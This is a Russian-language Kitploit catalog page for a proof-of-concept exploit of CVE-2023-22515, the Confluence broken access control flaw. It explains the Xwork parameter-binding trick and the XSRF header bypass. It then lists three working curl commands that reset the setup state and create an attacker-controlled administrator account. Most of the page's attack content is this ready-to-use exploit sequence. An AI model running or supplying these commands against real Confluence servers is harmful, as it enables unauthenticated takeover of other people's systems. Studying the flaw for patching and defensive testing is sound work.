Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-22515-POC — Концепт-доказательство эксплойта для CVE-2023-22515, критической уязвимости нарушенного контроля доступа в Confluence Server и Data Center, обеспечивающей неаутентифицированный захват администратора. | Kitploit
Инструменты/GitHubGitHub/j3seer/cve-2023-22515-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеRed Teaming
GitHubj3seer/cve-2023-22515-poc

CVE-2023-22515-POC

Концепт-доказательство эксплойта для CVE-2023-22515, критической уязвимости нарушенного контроля доступа в Confluence Server и Data Center, обеспечивающей неаутентифицированный захват администратора.

Репозиторий
8242 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-22515

CVE-2023-22515 — критическая уязвимость, затрагивающая локальные экземпляры Confluence Server и Confluence Data Center; уязвимость нарушенного контроля доступа (Broken Access Control). Atlassian присвоил ей базовую оценку CVSS 10.0.

Эксплойт

Краткое описание:

  1. Из-за того, как перехватчики Xwork обрабатывают параметры, /test.action?one=a эквивалентно вызову setOne()='a', а /test.action?one.two=a — вызову getOne().setTwo()="a".

  2. Конечные точки /setup/* включают вызов @ParameterSafe, который позволяет использовать set и get, например, в /setup/setupdb.action?dbConfigInfo.databaseType=postgresql. Однако, поскольку конечные точки /setup/* заблокированы после завершения настройки, можно использовать /server-info.action.

  3. Находим метод set для завершения настройки: getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);

  4. Используем заголовок «X-Atlassian-Token» для обхода XSRF.

curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

Ссылки

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Эксплойт не был обнаружен или создан мной — все заслуги принадлежат авторам статей ниже.

https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

https://blog.s1r1us.ninja/research/brokenconflu

Скачать инструмент